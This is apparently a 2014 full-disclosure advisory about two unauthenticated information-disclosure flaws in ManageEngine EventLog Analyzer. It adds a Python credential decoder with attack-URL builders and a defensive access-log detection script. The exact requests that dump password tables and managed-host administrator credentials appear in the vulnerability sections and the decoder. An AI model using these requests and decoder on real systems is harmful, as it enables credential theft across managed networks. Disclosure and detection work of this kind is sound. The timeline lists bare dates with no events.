Hi,
This is the 6th part of the ManageOwnage series. For previous parts see [1].
This time we have two 0 day vulns (CVE-2014-6038 and CVE-2014-6039) that can be
abused to dump information from the database and obtain the superuser
credentials for the Windows and AS/400 hosts managed by EventLog
Analyzer. A Metasploit module has also been released and should be
integrated in the framework in the next few days [2].
I'm releasing these as a 0 day since it's been 70 days since I
informed ManageEngine of this vulnerability and they have been
twiddling their thumbs ever since. The last update I got was that they
were "working on fixing it but couldn't commit to a date; the
tentative date is end of the year".
Since they have been vulnerable to a more serious remote code
execution 0 day for 67 days now (see [3]), I'm not holding this any
longer.
Details and timeline of disclosure are below, and a copy of this
advisory can be found at my repo [4].
Regards,
Pedro
Disclosure: 05/11/2014 / Last updated: 05/11/2014
>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security
Information and Event Management (SIEM) software on the market. Using
this Log Analyzer software, organizations can automate the entire
process of managing terabytes of machine generated logs by collecting,
analyzing, correlating, searching, reporting, and archiving from one
central location. This event log analyzer software helps to monitor
file integrity, conduct log forensics analysis, monitor privileged
users and comply to different compliance regulatory bodies by
intelligently analyzing your logs and instantly generating a variety
of reports like user activity reports, historical trend reports, and
more."
A Metasploit exploit that abuses these two vulnerabilities to obtain
the managed device superuser credentials has been released.
#1
Vulnerability: SQL database information disclosure (read any table in
the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed.
On v7 the URL has to be prefixed with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser -> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword -> user passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint -> user password hints
GET /agentHandler?mode=getTableData&table=HostDetails -> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)
#2
Vulnerability: Windows / AS/400 managed hosts Administrator
credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed.
On v7 the URL has to be prefixed with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 -> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)
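The two request shapes above and the two encodings of the stored credentials (XOR 0x30 for the HostDetails table dump in #1; base64 over XOR 0x30 for /hostdetails in #2) are small enough to be worth a decoder. The following is an added example written for this page, not code from the advisory or from the Metasploit module [2]. It assumes the XOR is applied to every byte of the string, decodes bytes as latin-1 so that any byte value survives, and uses a placeholder host and port; the "Admin123" sample value is constructed for the demonstration, not captured from a real system.

```python
import base64

# Per the advisory, stored credentials are "XOR'ed with 0x30" (HostDetails
# table dump, CVE-2014-6038) or "XOR'ed with 0x30 and base64 encoded"
# (/hostdetails, CVE-2014-6039). Assumption: the XOR covers every byte.
XOR_KEY = 0x30


def xor_0x30(data: bytes) -> bytes:
    """XOR every byte with 0x30. The operation is its own inverse."""
    return bytes(b ^ XOR_KEY for b in data)


def decode_table_credential(raw: bytes) -> str:
    """Decode a username/password as dumped from the HostDetails table
    (agentHandler?mode=getTableData&table=HostDetails): XOR 0x30 only.
    latin-1 is an assumption so that every byte value decodes without error."""
    return xor_0x30(raw).decode("latin-1")


def decode_hostdetails_credential(encoded: str) -> str:
    """Decode a username/password as returned by /hostdetails?slid=X&hostid=Y:
    base64 first, then XOR 0x30."""
    return xor_0x30(base64.b64decode(encoded)).decode("latin-1")


def encode_hostdetails_credential(plain: str) -> str:
    """Inverse of decode_hostdetails_credential; used here only to build
    constructed test input."""
    return base64.b64encode(xor_0x30(plain.encode("latin-1"))).decode("ascii")


def context_prefix(major_version: int) -> str:
    """v7 serves the application under /event/; later versions at the root."""
    return "/event" if major_version == 7 else ""


def table_dump_url(base: str, table: str, major_version: int) -> str:
    """Request for CVE-2014-6038: read any table, no authentication needed."""
    return (f"{base.rstrip('/')}{context_prefix(major_version)}"
            f"/agentHandler?mode=getTableData&table={table}")


def host_details_url(base: str, slid: int, hostid: int, major_version: int) -> str:
    """Request for CVE-2014-6039: managed-host superuser credentials,
    no authentication needed."""
    return (f"{base.rstrip('/')}{context_prefix(major_version)}"
            f"/hostdetails?slid={slid}&hostid={hostid}")


if __name__ == "__main__":
    # Constructed sample (not from a real system): "Admin123" XOR'ed with
    # 0x30 and base64 encoded, as /hostdetails would return it.
    sample = encode_hostdetails_credential("Admin123")
    print(sample, "->", decode_hostdetails_credential(sample))
    # Placeholder host/port; adjust to the target. v7 gets the /event/ prefix.
    print(table_dump_url("http://siem.example:8400", "AaaPassword", 7))
    print(host_details_url("http://siem.example:8400", 1, 1, 9))
```

Run it and compare the decoded output against what the live endpoint returns; if the decode produces garbage, the per-byte XOR assumption is the first thing to revisit.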
>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.
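With no vendor fix available, the practical response for anyone running an affected build is to watch for the two request shapes in the web access log of the EventLog Analyzer front end. The following detection is an added example written for this page, not code from the advisory or from ManageEngine. It assumes a combined-log-format access log in which the query string is recorded with the request line; the log lines it scans are constructed for the demonstration. It normalises the v7 /event/ context path so one rule covers every affected version, rates table reads of the four tables named in #1 as high and any other getTableData read as medium, and counts findings per client, since a tool chaining the two vulnerabilities, as the Metasploit module does, shows up as one client hitting both endpoints in quick succession.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Tables the advisory names as credential-bearing. Any other table is still an
# unauthenticated read-any-table request, only less obviously sensitive.
CREDENTIAL_TABLES = {"AaaUser", "AaaPassword", "AaaPasswordHint", "HostDetails"}

# Combined-log-format line: client, timestamp, request line, status, size.
# Assumption: the front end logs the query string as part of the request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(target: str):
    """Map a request target to (cve, severity, detail), or None when it is
    neither endpoint. The v7 /event/ context path is stripped first."""
    parts = urlsplit(target)
    path = parts.path
    if path.startswith("/event/"):
        path = path[len("/event"):]
    query = parse_qs(parts.query)
    if path == "/agentHandler" and query.get("mode") == ["getTableData"]:
        table = query.get("table", [""])[0]
        severity = "high" if table in CREDENTIAL_TABLES else "medium"
        return ("CVE-2014-6038", severity, f"table={table}")
    if path == "/hostdetails" and "hostid" in query:
        return ("CVE-2014-6039", "high", f"hostid={query['hostid'][0]}")
    return None


def scan_log(text: str) -> list:
    """Return one finding per matching request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("target"))
        if hit is None:
            continue
        cve, severity, detail = hit
        findings.append({
            "ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "cve": cve, "severity": severity, "detail": detail,
        })
    return findings


def sources(findings) -> Counter:
    """Findings per client address; a single client hitting both CVEs in
    quick succession is the signature of a tool that chains the two."""
    return Counter(f["ip"] for f in findings)


# Constructed sample log lines, not from any real deployment.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2014:10:15:01 +0000] "GET /agentHandler?mode=getTableData&table=AaaPassword HTTP/1.1" 200 5120
10.0.0.5 - - [05/Nov/2014:10:15:02 +0000] "GET /hostdetails?slid=1&hostid=1 HTTP/1.1" 200 812
10.0.0.7 - - [05/Nov/2014:10:16:40 +0000] "GET /event/agentHandler?mode=getTableData&table=HostDetails HTTP/1.1" 200 2048
10.0.0.9 - - [05/Nov/2014:10:17:00 +0000] "GET /event/index.do HTTP/1.1" 200 14000
10.0.0.5 - - [05/Nov/2014:10:18:00 +0000] "GET /agentHandler?mode=getTableData&table=Foo HTTP/1.1" 200 99
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['ip']} {f['cve']} {f['severity']} {f['detail']} status={f['status']}")
    print(dict(sources(hits)))
```

Note the caveat: the path name suggests /agentHandler is also used by the product's own agents, so on a deployment with agents expect legitimate hits on that endpoint and key the alert on the source address and on the table name rather than on the path alone. A 200 status on either endpoint from an address that is not a managed host or an administrator workstation is the finding to chase.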
Timeline of disclosure:
28/08/2014
28/08/2014
31/08/2014
11/09/2014
13/10/2014
17/10/2014
19/10/2014
05/11/2014
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
[2]
https://github.com/rapid7/metasploit-framework/pull/4137
[3]
http://seclists.org/fulldisclosure/2014/Aug/88
[4]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt